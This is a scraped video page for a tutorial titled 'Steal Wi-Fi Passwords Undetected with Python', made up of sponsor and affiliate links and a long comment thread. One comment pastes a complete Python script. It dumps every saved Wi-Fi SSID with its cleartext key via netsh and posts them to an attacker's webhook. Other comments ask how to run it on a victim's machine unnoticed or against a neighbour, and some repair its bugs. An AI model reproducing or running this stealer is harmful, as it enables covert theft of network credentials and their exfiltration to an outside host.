Steal Wi-Fi Passwords Undetected with Python

Поделиться
HTML-код
  • Опубликовано: 8 сен 2024
  • Thanks to our sponsor, Keeper Security. You can download Keeper Security's Password Manager here: bit.ly/3SvmAA4
    Wi-Fi Extractor: github.com/hma...
    ___________________________________________
    Pentests & Security Consulting: tcm-sec.com
    Get Trained: academy.tcm-se...
    Get Certified: certifications...
    Merch: merch.tcm-sec.com
    Sponsorship Inquiries: info@thecybermentor.com
    📱Social Media📱
    ___________________________________________
    Twitter: / thecybermentor
    Twitch: / thecybermentor
    Instagram: / thecybermentor
    LinkedIn: / heathadams
    Discord: / discord
    💸Donate💸
    ___________________________________________
    Like the channel? Please consider supporting me on Patreon:
    / thecybermentor
    Support the stream (one-time): streamlabs.com...
    Hacker Books:
    Penetration Testing: A Hands-On Introduction to Hacking: amzn.to/31GN7iX
    The Hacker Playbook 3: amzn.to/34XkIY2
    Hacking: The Art of Exploitation: amzn.to/2VchDyL
    The Web Application Hacker's Handbook: amzn.to/30Fj21S
    Real-World Bug Hunting: A Field Guide to Web Hacking: amzn.to/2V9srOe
    Social Engineering: The Science of Human Hacking: amzn.to/31HAmVx
    Linux Basics for Hackers: amzn.to/34WvcXP
    Python Crash Course, 2nd Edition: amzn.to/30gINu0
    Violent Python: amzn.to/2QoGoJn
    Black Hat Python: amzn.to/2V9GpQk
    My Build:
    lg 32gk850g-b 32" Gaming Monitor:amzn.to/30C0qzV
    darkFlash Phantom Black ATX Mid-Tower Case: amzn.to/30d1UW1
    EVGA 2080TI: amzn.to/30d2lj7
    MSI Z390 MotherBoard: amzn.to/30eu5TL
    Intel 9700K: amzn.to/2M7hM2p
    G.SKILL 32GB DDR4 RAM: amzn.to/2M638Zb
    Razer Nommo Chroma Speakers: amzn.to/30bWjiK
    Razer BlackWidow Chroma Keyboard: amzn.to/2V7A0or
    CORSAIR Pro RBG Gaming Mouse: amzn.to/30hvg4P
    Sennheiser RS 175 RF Wireless Headphones: amzn.to/31MOgpu
    My Recording Equipment:
    Panasonic G85 4K Camera: amzn.to/2Mk9vsf
    Logitech C922x Pro Webcam: amzn.to/2LIRxAp
    Aston Origin Microphone: amzn.to/2LFtNNE
    Rode VideoMicro: amzn.to/309yLKH
    Mackie PROFX8V2 Mixer: amzn.to/31HKOMB
    Elgato Cam Link 4K: amzn.to/2QlicYx
    Elgate Stream Deck: amzn.to/2OlchA5
    *We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.

Комментарии • 79

  • @rhondaverma6358
    @rhondaverma6358 2 года назад +16

    I thought your python coding from your last video was great! I slowly followed step-by-step because I’m just beginning. Thank you for all your videos!

  • @bromadski
    @bromadski 2 года назад +27

    I love the culture of over-sharing of our industry. Thank you tcm.

  • @tyrannicalguy7262
    @tyrannicalguy7262 Год назад +3

    I took your course on pentesting from TCM sec and it was very good. This code is really efficient from your previous one. Keep it coming!!!!!!

  • @LoayMatar
    @LoayMatar 2 года назад +6

    That's awesome. Please keep doing Python tutorials like this. Thank you for the knowledge you share.

  • @MrDrwicksy
    @MrDrwicksy 2 года назад +3

    One problem is if the user has any files already starting with "Wi-Fi" in their directory this will also delete those. You could use datetime and pathlib to check if the files were created in the last few minutes and then only store the recent ones as a workaround

  • @prayaspatel6325
    @prayaspatel6325 2 года назад +2

    Thank you for making content for free. Love from India♥

  • @AzzazMwaz
    @AzzazMwaz Год назад +1

    I really loved what you're doing man. Let's say I wanted to save all the passwords in a USB flash drive instead of posting the data to web hook site. How would I go about it?

  • @itsme7570
    @itsme7570 2 года назад +2

    Nice stussy shirt. Used to wear them all the time when I used to skateboard

  • @TheSkiddywinks
    @TheSkiddywinks 2 года назад

    The biggest thing I picked up on from the first video was that you did a lot of disc IO that wasn't needed, when you could have just worked in memory with a dictionary. Also, leaving behind the files. So it's good to see all of those things addressed in this video.
    While the XML parser is more elegant, I think there is a danger sometimes when people start improving on their scripts that they start making them less viable. In this case I'm pretty sure ET is a standard library installed with Python, so it's fine, but if it wasn't then the "new and improved" script would simply not work without a separate install on the target machine. While it might seem "janky" to do something in such an iterative manner with simple tools, the big benefit is compatability.
    "If it's stupid and it works, it isn't stupid"

  • @TCMSecurityAcademy
    @TCMSecurityAcademy  2 года назад +4

    Thanks to our sponsor, Keeper Security. You can download Keeper Security's Password Manager here: bit.ly/3SvmAA4

    • @AzzazMwaz
      @AzzazMwaz Год назад +1

      @The Cyber Mentor, how can you save the passwords in a USB flash drive, instead of posting them on webhoook site? I mean the code to do that.

  • @keisukebaji5135
    @keisukebaji5135 2 года назад

    Thank you very much sir for all your contributions to this community

  • @mrmister.101
    @mrmister.101 Год назад

    Guys, if you get an error when trying to download the requirements.txt, it is because the pyinstaller value is set at 5.3. You want to change this to 5.13. Has anyone else had this problem?

  • @overwatch9659
    @overwatch9659 2 года назад +3

    Thank you very much for you good content .

  • @thkhan
    @thkhan 2 года назад

    and we dothank you for your honest acceptance.

  • @gajendrasinghthakur6189
    @gajendrasinghthakur6189 2 года назад +2

    Huge respect to you Man

  • @mojojojo7058
    @mojojojo7058 2 года назад

    This was so helpful!! Thank you

  • @dominicy4868
    @dominicy4868 2 года назад +3

    Just so I understand... this would be for a network you're already hard wired into with an ethernet cable and want to grab their wi-fi information, right?

  • @tobi827
    @tobi827 2 года назад +2

    Thank you sir for all your contributions to this communityp

  • @vaibhavkumar4655
    @vaibhavkumar4655 2 года назад +1

    Please show us the executable one also🥺

  • @DarkCom69
    @DarkCom69 2 года назад +1

    Sir which is the best coding language for hacker and to be a bug bounty hunter.
    Please reply sir🙏

    • @SamOween
      @SamOween 2 года назад

      Python, C, Rust, JavaScript

  • @channly
    @channly Год назад

    I get an error: on line 33 there's "%s=%s without a closing ". Powershell is complaining. Can you help? Your Github post doesn't resemble the code showed here.

  • @skandergharbi2598
    @skandergharbi2598 2 года назад

    That's great but I really don't understand how you know which Wi-Fi network you're hacking. I guess I'll understand it better as I go forth in your courses

    • @brightdorian2890
      @brightdorian2890 2 года назад

      he is not hacking networks he's trying to steal wifi passwords from Windows machine

  • @blockchaindomain
    @blockchaindomain 2 года назад

    in line 12. should'nt it read "export profile", ?

  • @user-ep5mw1sj5x
    @user-ep5mw1sj5x 4 месяца назад

    if not plss can yu tell me the name of the app Thank yu

  • @screwedvrinxyy._.7078
    @screwedvrinxyy._.7078 Год назад

    ive tried to download the wifi extractor in gibhub but theres a thing that says to install the modules idk what to do at that point can someone guide me

  • @naastow6260
    @naastow6260 Год назад

    is this if you are previously connected to wifi connection or not?
    need help please someone answer ASAP!!!!

  • @gennadridaniasramadhan8629
    @gennadridaniasramadhan8629 Год назад

    would you do the windows vers?

  • @satdevlpr
    @satdevlpr Год назад

    Thanks.. how could we run this script in a remote machine without the user knowing it?. can you make a video on this?

  • @euclideschilombe3965
    @euclideschilombe3965 Год назад

    Hi? I do this in Kali using Vmware to execute that look what I am see:
    'phyton' it is not recognized as an internal or external command an operable program or a file in lots.
    how can I fix that?

  • @iyamlegend
    @iyamlegend 11 месяцев назад

    What if the password is encrypted???
    What do you do

  • @alwinmi811
    @alwinmi811 4 месяца назад

    Can this beat wpa2?

  • @user-ep5mw1sj5x
    @user-ep5mw1sj5x 4 месяца назад

    plss can you send me a link or where yu downloading this current app from

  • @darekkonopka2031
    @darekkonopka2031 Год назад

    Anybody else having trouble running a windows command on a linux machine?

  • @sagarpandey456
    @sagarpandey456 2 месяца назад

    Hey somebody provide the code plss

  • @tobygoodhue2612
    @tobygoodhue2612 Год назад

    python tells me "tree = ET.parse(files)
    NameError: name 'files' is not defined"

    • @gamingguru-rq6dz
      @gamingguru-rq6dz Год назад

      import subprocess, os, sys, requests, re, urllib
      # Replace with your webhook
      url = 'your url here'
      # Lists and regex
      found_ssids = []
      pwnd = []
      wlan_profile_regex = r"All User Profile\s+:\s(.*)$"
      wlan_key_regex = r"Key Content\s+:\s(.*)$"
      #Use Python to execute Windows command
      get_profiles_command = subprocess.run(["netsh", "wlan", "show", "profiles"], stdout=subprocess.PIPE).stdout.decode()
      #Append found SSIDs to list
      matches = re.finditer(wlan_profile_regex, get_profiles_command, re.MULTILINE)
      for match in matches:
      for group in match.groups():
      found_ssids.append(group.strip())
      #Get cleartext password for found SSIDs and place into pwnd list
      for ssid in found_ssids:
      get_keys_command = subprocess.run(["netsh", "wlan", "show", "profile", ("%s" % (ssid)), "key=clear"], stdout=subprocess.PIPE).stdout.decode()
      matches = re.finditer(wlan_key_regex, get_keys_command, re.MULTILINE)
      for match in matches:
      for group in match.groups():
      pwnd.append({
      "SSID":ssid,
      "Password":group.strip()
      })
      #Check if any pwnd Wi-Fi exists, if not exit
      if len(pwnd) == 0:
      print("No Wi-Fi profiles found. Exiting...")
      sys.exit()
      print("Wi-Fi profiles found. Check your webhook...")
      #Send the hackies to your webhookz
      final_payload = ""
      for pwnd_ssid in pwnd:
      final_payload += "[SSID:%s, Password:%s]
      " % (pwnd_ssid["SSID"], pwnd_ssid["Password"]) # Payload display format can be changed as desired
      r = requests.post(url, params="format=json", data=final_payload)
      have this

  • @TaravaskRR
    @TaravaskRR Год назад

    hey when I finished typing this out I tried to run it on my own internet it said there was no module named requests could you please help me out if possible :)

    • @user-ke2yi6ie6f
      @user-ke2yi6ie6f Год назад

      hey man, i know it can be too late but still, write into cmd next command: pip install requests

    • @TaravaskRR
      @TaravaskRR Год назад

      @@user-ke2yi6ie6f thank you
      :)

    • @1234t6-g
      @1234t6-g 3 месяца назад

      Can you copy paste the code here so that we can use.

  • @vranime3772
    @vranime3772 2 года назад

    Make one for linux

  • @KC-jb9eg
    @KC-jb9eg 2 года назад +1

    8 space tab 😬

  • @scavengerkryovsnetworks4716
    @scavengerkryovsnetworks4716 Год назад

    Hoe to make this run on Android phones?

  • @celestialranger5348
    @celestialranger5348 2 года назад

    How to run this as an exe file ?

  • @christiansepulveda2099
    @christiansepulveda2099 2 года назад

    How can I get you to help me ?

  • @brandonmathueofficial
    @brandonmathueofficial Год назад

    Being authentic regarding this line of work is misplaced and immature. Teach us what works and what doesn’t work

  • @alessiomichelassi8390
    @alessiomichelassi8390 Год назад

    it works but i got a problem using stdout.decode() at the end of the command.
    command = subprocess.run(["netsh", "wlan", "export", "profile", "key=clear"], capture_output=True).stdout.decode()
    UnicodeDecodeError: 'utf-8' codec can't decode byte 0x85 in position 30: invalid start byte

  • @sahilrana9141
    @sahilrana9141 Год назад

    in my case it is showing that no wifi profiles exist but in my area ther are a lot of wifis somebody pls help

    • @kakosehr2854
      @kakosehr2854 Год назад

      It does not grab paw word online, it grabs it if ported through usb into a pc, yet i ve to run the code, let see

    • @sahilrana9141
      @sahilrana9141 Год назад

      @@kakosehr2854 Then what should I do

    • @kakosehr2854
      @kakosehr2854 Год назад

      @@sahilrana9141 continue research.

  • @ElkoGuitarist
    @ElkoGuitarist 2 года назад

    Cheers

  • @patricwell8335
    @patricwell8335 2 года назад

    Subscribe hell yeah...knowledge sharing love it

  • @phinehasantwi9615
    @phinehasantwi9615 2 года назад

    Thanks

  • @zlee5159
    @zlee5159 2 года назад

    This code doesn't run if there are open(password less) networks stored. line 28: password = root [4] [0] [1] [2].text will return an IndexError: child index out of range. How can you make this a conditional variable if the file doesn't have the same root structure?

    • @TCMSecurityAcademy
      @TCMSecurityAcademy  2 года назад +1

      See the GitHub. We've patched some of this.

    • @zlee5159
      @zlee5159 2 года назад

      @@TCMSecurityAcademy Ok, banging my head against reg expressions is how I initially went about solving it, yuck. Glad Its already been done :)

  • @chrisstevens2
    @chrisstevens2 2 года назад

    ET phone home!

  • @phines8499
    @phines8499 2 года назад

    Can i copy this to steal my neighbours WiFi password?

    • @heinrich..
      @heinrich.. 2 года назад

      only if you have access to their machine

  • @cod3c237
    @cod3c237 2 года назад

    U are awesome!! Claim your here within an hour ticked here!

  • @infobymattcole7724
    @infobymattcole7724 2 года назад

    Nice.

  • @marveII0us
    @marveII0us 2 года назад

    Wow

  • @Riborwahz
    @Riborwahz 2 года назад

    I'm the third

  • @M-Cipher
    @M-Cipher Год назад

    it only get 1 password from all stored pass....

  • @anamnesis726
    @anamnesis726 2 года назад

    Thx!! Though I keep on having this issue : payload_str = " & ".join("%s=%s % (k,v) for k, v in payload.items())
    SyntaxError: unterminated string literal (detected at line 35)
    It seems it's missing a " but if I add it after (k,v)" it doesn't work either!?

    • @WilcovanBeijnum
      @WilcovanBeijnum 2 года назад +1

      The " is missing after the second %s, then it should work I think

    • @anamnesis726
      @anamnesis726 2 года назад +1

      @@WilcovanBeijnum Tyvm it works fine now! :)

  • @sahiku5357
    @sahiku5357 Год назад

    get_profiles_command = subprocess.run(["netsh", "wlan", "show", "profiles"], stdout=subprocess.PIPE).stdout.decode()
    UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 31: invalid start byte
    i got this error !!

  • @sotecluxan4221
    @sotecluxan4221 2 года назад +1

    !

  • @TimothyB14980
    @TimothyB14980 Год назад

    User Kali Linux Nyolong WiFi tetangga: wifite